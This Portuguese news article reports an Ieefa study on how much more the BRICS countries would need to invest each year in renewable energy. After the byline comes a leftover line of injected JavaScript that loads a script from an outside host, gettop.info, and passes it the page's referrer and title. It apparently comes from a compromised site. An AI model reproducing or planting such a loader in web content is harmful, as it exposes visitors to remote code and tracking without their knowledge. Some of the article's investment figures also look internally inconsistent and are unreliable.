Brics precisam de mais US$ 51 bilhões ao ano para produzir energia limpa

energia-solar-divulgacao
Energia solar é uma das alternativas energéticas renováveis que precisam de investimentos bilionários. Foto: divulgação

Igor Rozin*

Em meados de outubro, durante a 8ª cúpula do Brics (Brasil, Rússia, Índia, China e África do Sul) em Goa, na Índia, o grupo decidiu aumentar a produção e utilização de energia renovável por seus membros. Mas suas indústrias precisariam de ao menos US$ 51 bilhões adicionais por ano para alcançar esse objetivo, de acordo com a pesquisa do Instituto de Economia Energética e Análise Financeira (Ieefa na sigla, em inglês).

Entre 2020 e 2030, os países do Brics deverão produzir 1,25 mil gigawatts de energia limpa ao ano, a um custo de US$ 975 bilhões. A China deverá receber a maior parte dos investimentos (US$ 622 bilhões); a Índia, US$ 157 bilhões; e o Brasil, US$ 120 bilhões.

Em 2015, junto a outro países da América Latina, os membros do Brics entraram para o top-10 de investimentos em energia renovável e receberam quase 40% do total investido mundialmente no setor.

Para alcançar o objetivo anunciado em Goa, cada país do Brics deverá investir em energia renovável US$ 177 bilhões por ano, de acordo com pesquisadores. Mas os valores reais são muito inferiores. A China investe cerca de US$ 102,9 bilhões por ano em economia hipocarbônica (com redução de emissões de carbono), enquanto os outros quatro países do grupo não dispensam mais de US$ 23 bilhões por ano ao setor.

Solar e eólica – Assim, apesar do aumento da capacidade da energia eólica em 2016 para 140 gigawatts, os investimentos nessa tecnologia caíram 29%. Além disso, uma queda significativa nos preços da energia solar e da eólica poderá ajudar a China a atingir seus objetivos a um custo menor.

Na Rússia, de acordo com o estudo, a economia foi afetada pelas sanções da União Europeia e dos EUA e pelos baixos preços do petróleo e do gás, o que levou à diminuição do interesse dos investidores por energia limpa.

Para resolver a situação, os países devem desenvolver um programa de financiamento misto público-privado de projetos de energia limpa, de acordo com os pesquisadores do Ieefa.

*Da Gazeta Russa, com a agência de notícias Tass

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário